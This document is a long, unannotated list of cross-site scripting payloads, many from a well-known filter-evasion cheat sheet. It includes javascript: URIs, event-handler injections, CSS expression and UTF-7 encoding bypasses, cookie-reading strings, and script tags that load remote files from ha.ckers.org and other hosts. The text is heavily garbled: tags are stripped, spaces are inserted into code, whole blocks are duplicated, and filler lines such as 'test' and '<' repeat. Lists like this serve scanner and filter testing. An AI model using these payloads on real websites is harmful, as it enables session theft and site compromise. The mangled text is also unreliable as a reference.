javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
'`">javascript:alert(1)
'`">javascript:alert(1)
\x3Cscript>javascript:alert(1)
'"`>/* *\x2Fjavascript:alert(1)// */
javascript:alert(1)</script\x0D
javascript:alert(1)</script\x0A
javascript:alert(1)</script\x0B
javascript:alert(1)
-->
--> -->
--> -->
--> -->
--> -->
`"'>
test
"'`>a='hello\x27;javascript:alert(1)//';
test
test
test
test
test
test
test
test
test
test
test
test
test
test
/* *\x2A/javascript:alert(1)// */
/* *\x00/javascript:alert(1)// */
"'`>ABCDEF
"'`>ABCDEF
if("x\\xE1\x96\x89". length==2) { javascript:alert(1);}
if("x\\xE0\xB9\x92". length==2) { javascript:alert(1);}
if("x\\xEE\xA9\x93". length==2) { javascript:alert(1);}
'`">javascript:alert(1)
'`">javascript:alert(1)
"'`>
"'`>
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
"`'>\x3Bjavascript:alert(1)
"`'>\x0Djavascript:alert(1)
"`'>\xEF\xBB\xBFjavascript:alert(1)
"`'>\xE2\x80\x81javascript:alert(1)
"`'>\xE2\x80\x84javascript:alert(1)
"`'>\xE3\x80\x80javascript:alert(1)
"`'>\x09javascript:alert(1)
"`'>\xE2\x80\x89javascript:alert(1)
"`'>\xE2\x80\x85javascript:alert(1)
"`'>\xE2\x80\x88javascript:alert(1)
"`'>\x00javascript:alert(1)
"`'>\xE2\x80\xA8javascript:alert(1)
"`'>\xE2\x80\x8Ajavascript:alert(1)
"`'>\xE1\x9A\x80javascript:alert(1)
"`'>\x0Cjavascript:alert(1)
"`'>\x2Bjavascript:alert(1)
"`'>\xF0\x90\x96\x9Ajavascript:alert(1)
"`'>-javascript:alert(1)
"`'>\x0Ajavascript:alert(1)
"`'>\xE2\x80\xAFjavascript:alert(1)
"`'>\x7Ejavascript:alert(1)
"`'>\xE2\x80\x87javascript:alert(1)
"`'>\xE2\x81\x9Fjavascript:alert(1)
"`'>\xE2\x80\xA9javascript:alert(1)
"`'>\xC2\x85javascript:alert(1)
"`'>\xEF\xBF\xAEjavascript:alert(1)
"`'>\xE2\x80\x83javascript:alert(1)
"`'>\xE2\x80\x8Bjavascript:alert(1)
"`'>\xEF\xBF\xBEjavascript:alert(1)
"`'>\xE2\x80\x80javascript:alert(1)
"`'>\x21javascript:alert(1)
"`'>\xE2\x80\x82javascript:alert(1)
"`'>\xE2\x80\x86javascript:alert(1)
"`'>\xE1\xA0\x8Ejavascript:alert(1)
"`'>\x0Bjavascript:alert(1)
"`'>\x20javascript:alert(1)
"`'>\xC2\xA0javascript:alert(1)
"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
javascript:alert(1)
<video poster=javascript:javascript:alert(1)//
...............
Clickme clickme
XXX
javascript:alert(1)
alert(1)0
document. getElementById("div2"). innerHTML = document. getElementById("div1"). innerHTML;
javascript:alert(1)">
javascript:alert(1)">
javascript:alert(1)">
javascript:alert(1)'>">
javascript:alert(1)">
javascript:alert(1)">
d. innerHTML=d. innerHTML
XXX
javascript:alert(1)"` `>
">
javascript:alert(1)
-->
p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
@import "data:,*%7bx:expression(javascript:alert(1))%7D";
XXXXXX
*[{}@import'%(css)s?]X
XXX
XXX
*{x:expression(javascript:alert(1))}
X with(document. getElementById("d"))innerHTML=innerHTML
XXX #x{font-family:foo[bar;color:green;} #y];color:red;{}
XXX
({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval
({0:#0=eval/#0#/#0#(javascript:alert(1))})
ReferenceError. prototype. __defineGetter__('name', function(){javascript:alert(1)}),x
Object. __noSuchMethod__ = Function,[{}][0]. constructor. _('javascript:alert(1)')()
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
&alert&A7&(1)&R&UA;&&
¼script¾javascript:alert(1)¼/script¾
XXX
%(payload)s
javascript:alert(1)
%(payload)s//
<IMG SRC="javascript:javascript:alert(1)"
<iframe src=%(scriptlet)s <
@import'%(css)s';
; REL=stylesheet">
li {list-style-image: url("javascript:javascript:alert(1)");}XSS
javascript:alert(1);
. XSS{background-image:url("javascript:javascript:alert(1)");}
BODY{background:url("javascript:javascript:alert(1)")}
javascript:alert(1);
XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(1)">
+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
@import'%(css)s';
a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}
&&javascript:alert(1)&&;&&
javascript:alert(1);
]]
test1
test1
%(payload)s">
">
';alert(String. fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";
alert(String. fromCharCode(88,83,83))//";alert(String. fromCharCode(88,83,83))//--
>">'>alert(String. fromCharCode(88,83,83))
'';!--"=&{()}
xxs link
xxs link
alert("XSS")">
perl -e 'print "";' > out
alert("XSS");//
<IMG SRC="javascript:alert('XSS')"
<iframe src=<a href="http://ha.ckers.org/scriptlet.html" target="_blank" rel="nofollow">ha.ckers.org/scriptlet.html</a> <
\";alert('XSS');//
alert("XSS");
li {list-style-image: url("javascript:alert('XSS')");}XSS
@import'ha.ckers.org/xss.css';
; REL=stylesheet">
BODY{-moz-binding:url("ha.ckers.org/xssmoz.xml#xss")}
@im\port'\ja\vasc\ript:alert("XSS")';
exp/*
alert('XSS');
. XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}
BODY{background:url("javascript:alert('XSS')")}
¼script¾alert(¢XSS¢)¼/script¾
'"-->
alert("XSS")'); ?>
Redirect 302 /a. jpg victimsite.com/admin.asp&deleteuser
alert('XSS')">
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
" SRC="ha.ckers.org/xss.js">
" SRC="ha.ckers.org/xss.js">
" '' SRC="ha.ckers.org/xss.js">
'" SRC="ha.ckers.org/xss.js">
` SRC="ha.ckers.org/xss.js">
'>" SRC="ha.ckers.org/xss.js">
document. write("PT SRC="ha.ckers.org/xss.js">
XSS
XSS
XSS
XSS
XSS
XSS
{font-family:''
<input/onmouseover="javaSCRIPT:confirm(1)"
alert(1) {Opera}
<img/src=`%00` onerror=this. onerror=confirm(1)
<isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

prompt(1)</ScRipT giveanswerhere=?
/*%00*/alert(1)/*%00*/</script /*%00*/
">%00
">
</script
<script x:href='https://<a href="http://dl.dropbox.com/u/13018058/js.js" target="_blank" rel="nofollow">dl.dropbox.com/u/13018058/js.js</a>' {Opera}
X</a
http://<a href="http://www.googlealert" target="_blank" rel="nofollow">www.googlealert</a>(<a href="http://document.location" target="_blank" rel="nofollow">document.location</a>)</script
XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
alert(String. fromCharCode(49))</script ^__^
/**/alert(document. location)/**/</script   :-(
�
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
alert(0%0)
SPAN
<img/src='http://i.<a href="http://imgur.com/P8mL8.jpg" target="_blank" rel="nofollow">imgur.com/P8mL8.jpg</a>' onmouseover=	prompt(1)
">{-o-link-source:''
OnMouseOver {Firefox & Opera}
^__^
X {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
////
/*iframe/src*/
//|\\ //|\\ </script //|\\
/{src:''/
<plaintext/onmouseover=prompt(1)
''alert(1) {Opera}
DIV
On Mouse Over
Click Here
alert(1);
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<iframe/src=javascript:confirm(1)
http://<a href="http://www.alert" target="_blank" rel="nofollow">www.alert</a>(1)</script . com
alert(1)
click
MsgBox+1
">X</a
~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
</script a=\u0061 & /=%2F
</script
+-+-1-+-+alert(1)
/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
//
confirm(1);
alert(1)
ClickMe
alert(1) </script 1=2
style="x:">
--!>
">
CLICKME
click
Click Me
‘; alert(1);
‘)alert(1);//
alert(1)
{font-family:''
<input/onmouseover="javaSCRIPT:confirm(1)"
alert(1) {Opera}
<img/src=`%00` onerror=this. onerror=confirm(1)
<isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

prompt(1)</ScRipT giveanswerhere=?
/*%00*/alert(1)/*%00*/</script /*%00*/
">%00
">
</script
<script x:href='https://<a href="http://dl.dropbox.com/u/13018058/js.js" target="_blank" rel="nofollow">dl.dropbox.com/u/13018058/js.js</a>' {Opera}
X</a
http://<a href="http://www.googlealert" target="_blank" rel="nofollow">www.googlealert</a>(<a href="http://document.location" target="_blank" rel="nofollow">document.location</a>)</script
XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
alert(String. fromCharCode(49))</script ^__^
/**/alert(document. location)/**/</script   :-(
�
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
alert(0%0)
SPAN
<img/src='http://i.<a href="http://imgur.com/P8mL8.jpg" target="_blank" rel="nofollow">imgur.com/P8mL8.jpg</a>' onmouseover=	prompt(1)
">{-o-link-source:''
OnMouseOver {Firefox & Opera}
^__^
X {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
////
/*iframe/src*/
//|\\ //|\\ </script //|\\
/{src:''/
<plaintext/onmouseover=prompt(1)
''alert(1) {Opera}
DIV
On Mouse Over
Click Here
alert(1);
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<iframe/src=javascript:confirm(1)
http://<a href="http://www.alert" target="_blank" rel="nofollow">www.alert</a>(1)</script . com
alert(1)
click
MsgBox+1
">X</a
~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
</script a=\u0061 & /=%2F
</script
+-+-1-+-+alert(1)
/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
//
confirm(1);
alert(1)
ClickMe
alert(1) </script 1=2
style="x:">
--!>
">
CLICKME
click
Click Me
String. fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)
‘;alert(String. fromCharCode(88,83,83))//’;alert(String. fromCharCode(88,83,83))//”;alert(String. fromCharCode(88,83,83))//”;alert(String. fromCharCode(88,83,83))//–>”>’>alert(String. fromCharCode(88,83,83))
alert(“XSS”)”>
alert(“XSS”);//
%253cscript%253ealert(1)%253c/script%253e
“>alert(document. cookie)
fooalert(1)
ipt>alert(1)ipt>
<IMG SRC=”javascript:alert(‘XSS’)”
<iframe src=<a href="http://ha.ckers.org/scriptlet.html" target="_blank" rel="nofollow">ha.ckers.org/scriptlet.html</a> <
javascript:alert("hellox worldss")
">'>alert(String. fromCharCode(88,83,83))
" SRC="ha.ckers.org/xss.js">
" '' SRC="ha.ckers.org/xss.js">
'" SRC="ha.ckers.org/xss.js">
'>" SRC="ha.ckers.org/xss.js">
document. write("PT SRC="ha.ckers.org/xss.js">
alert("XSS");//
">'>alert(String. fromCharCode(88,83,83))
';alert(String. fromCharCode(88,83,83))//\';alert(String. fromCharCode(88,83,83))//";alert(String. fromCharCode(88,83,83))//\";alert(String. fromCharCode(88,83,83))//-->">'>alert(String. fromCharCode(88,83,83))&submit. x=27&submit. y=9&cmd=search
alert("hellox worldss")&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
alert("XSS");&search=1
0&q=';alert(String. fromCharCode(88,83,83))//\';alert%2?8String. fromCharCode(88,83,83))//";alert(String. fromCharCode?(88,83,83))//\";alert(String. fromCharCode(88,83,83)%?29//-->">'>alert(String. fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search
hellox worldss
...
lol
alert(1)">
alert(1)">
alert(1)">
alert(1)'>">
alert(1)">
alert(123)">
LOL
LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}
({0:#0=alert/#0#/#0#(0)})
LOLalert(123)
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\\";alert('XSS');//
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<BGSOUND SRC=\"javascript:alert('XSS');\">
<BR SIZE=\"&{alert('XSS')}\">
<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
<XSS STYLE=\"behavior: url(xss.htc);\">
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
žscriptualert(EXSSE)ž/scriptu
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"width: expression(alert('XSS'));\">
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
<XSS STYLE=\"xss:expression(alert('XSS'))\">
exp/*<A STYLE='no\xss:noxss(\"*//*\");
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
<BASE HREF=\"javascript:alert('XSS');//\">
<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
<XML SRC=\"xsstest.xml\" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
<?import namespace=\"t\" implementation=\"#default#time2\">
<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
</BODY></HTML>
<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
<? echo('<SCR)';
echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<A HREF=\"http://66.102.7.147/\">XSS</A>
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
<A HREF=\"http://1113982867/\">XSS</A>
<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
<A HREF=\"//www.google.com/\">XSS</A>
<A HREF=\"//google\">XSS</A>
<A HREF=\"http://ha.ckers.org@google\">XSS</A>
<A HREF=\"http://google:ha.ckers.org\">XSS</A>
<A HREF=\"http://google.com/\">XSS</A>
<A HREF=\"http://www.google.com./\">XSS</A>
<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
<A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
<iframe src=http://ha.ckers.org/scriptlet.html>
<IMG SRC=\"javascript:alert('XSS')\"
<SCRIPT SRC=//ha.ckers.org/.js>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<IMG SRC=\" javascript:alert('XSS');\">
perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav	ascript:alert('XSS');\">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=\"javascript:alert('XSS');\">
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
'';!--\"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String. fromCharCode(88,83,83))//\';alert(String. fromCharCode(88,83,83))//";alert(String. fromCharCode(88,83,83))//\";alert(String. fromCharCode(88,83,83))//-->">'>alert(String. fromCharCode(88,83,83))
'';!--"=&{()}
alert("XSS")">
alert("XSS");//
a=/XSS/alert(a. source)
\";alert('XSS');//
alert("XSS");
¼script¾alert(¢XSS¢)¼/script¾
@im\port'\ja\vasc\ript:alert("XSS")';
exp/*
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
document. write("PT SRC="ha.ckers.org/xss.js">
TESTHTML5FORMACTION
crosssitespt
alert(1)">
alert(1)">
alert(1)">
({0:#0=alert/#0#/#0#(123)})
ReferenceError. prototype. __defineGetter__('name', function(){alert(123)}),x
Object. __noSuchMethod__ = Function,[{}][0]. constructor. _('alert(1)')()
{alert(1)};1
crypto. generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')
alert(1)
+ADw-script+AD4-alert(document. location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document. location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document. location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document. location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document. cookie)%253c/script%253e
“>alert(document. cookie)
“>alert(document. cookie)
“>alert(document. cookie);//
fooalert(document. cookie)
ipt>alert(document. cookie)ipt>
%22/%3E%3CBODY%20onload=’document. write(%22%3Cs%22%2b%22cript%20src=my.box.com/xss.js%3E%3C/script%3E%22)’%3E
‘; alert(document. cookie); var foo=’
foo\’; alert(document. cookie);//’;
alert(document. cookie)
alert(1)
">alert(String. fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))
';alert(String. fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String. fromCharCode(88,83,83))//";alert(String. fromCharCode(88,83,83))//-->">'>alert(String. fromCharCode(88,83,83))
'';!--"=&{()}
0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"
xxs link
xxs link
alert("XSS")">
<IMG SRC=javascript:alert(
'XSS')>
<IMG SRC=javascript:a&
#0000108ert('XSS')>
alert("XSS");//
<IMG SRC="javascript:alert('XSS')"
<iframe src=<a href="http://ha.ckers.org/scriptlet.html" target="_blank" rel="nofollow">ha.ckers.org/scriptlet.html</a> <
\";alert('XSS');//
alert('XSS');
alert("XSS");
li {list-style-image: url("javascript:alert('XSS')");}XSS
@import'ha.ckers.org/xss.css';
; REL=stylesheet">
BODY{-moz-binding:url("ha.ckers.org/xssmoz.xml#xss")}
@im\port'\ja\vasc\ript:alert("XSS")';
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
alert('XSS');
. XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}
¼script¾alert(¢XSS¢)¼/script¾
alert('XSS');
'"-->
alert("XSS")'); ?>
alert('XSS')">
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
" SRC="ha.ckers.org/xss.js">
" SRC="ha.ckers.org/xss.js">
" '' SRC="ha.ckers.org/xss.js">
'" SRC="ha.ckers.org/xss.js">
` SRC="ha.ckers.org/xss.js">
'>" SRC="ha.ckers.org/xss.js">
document. write("PT SRC="ha.ckers.org/xss.js">
XSS
0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#">
element[attribute='
[[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
alert;pg("XSS")
for((i)in(self))eval(i)(1)
ipt>alert(1)ipt>ipt>alert(1)ipt>
iPt>alert(1)IPt>
test
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
">">123
">123
">123
">alert(`text you want to be displayed`);<iframe frameborder="0%ef%bb%bf
">123
">123
><IFRAME width="420" height="315" frameborder="0" onmouseover="document. location. href='https://<a href="http://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr" target="_blank" rel="nofollow">www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr</a>
g'">Hover the cursor to the LEFT of this Message&ParamHeight=250
">">123
">123
<iframe src=<a href="http://xss.rocks/scriptlet.html" target="_blank" rel="nofollow">xss.rocks/scriptlet.html</a> <
{font-family:''
<input/onmouseover="javaSCRIPT:confirm(1)"
alert(1) {Opera}
<img/src=`` onerror=this. onerror=confirm(1)
<isindex formaction="javascript:confirm(1)"
<img src=``
 onerror=alert(1)

prompt(1)</ScRipT giveanswerhere=?
/**/alert(1)/**/</script /**/
">
">
<script xlink:href=data:,window. open('https://<a href="http://www.google.com/" target="_blank" rel="nofollow">www.google.com/</a>') </script
<script x:href='https://<a href="http://dl.dropbox.com/u/13018058/js.js" target="_blank" rel="nofollow">dl.dropbox.com/u/13018058/js.js</a>' {Opera}
X</a
http://<a href="http://www.googlealert" target="_blank" rel="nofollow">www.googlealert</a>(<a href="http://document.location" target="_blank" rel="nofollow">document.location</a>)</script
XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
alert(String. fromCharCode(49))</script ^__^
/**/alert(document. location)/**/</script   :-(
�
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
alert(0%0)
SPAN
<img/src='http://i.<a href="http://imgur.com/P8mL8.jpg" target="_blank" rel="nofollow">imgur.com/P8mL8.jpg</a>' onmouseover=	prompt(1)
">{-o-link-source:''
OnMouseOver {Firefox & Opera}
^__^
X {IE7}
<iframe// src=javaSCRIPT:alert(1)
////
/*iframe/src*/
//|\\ //|\\ </script //|\\
/{src:''/
<plaintext/onmouseover=prompt(1)
''alert(1) {Opera}
DIV
On Mouse Over
Click Here
alert(1);
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<iframe/src=javascript:confirm(1)
http://<a href="http://www.alert" target="_blank" rel="nofollow">www.alert</a>(1)</script . com
alert(1)
click
MsgBox+1
">X</a
~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
</script a=\u0061 & /=%2F
</script
+-+-1-+-+alert(1)
/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
//
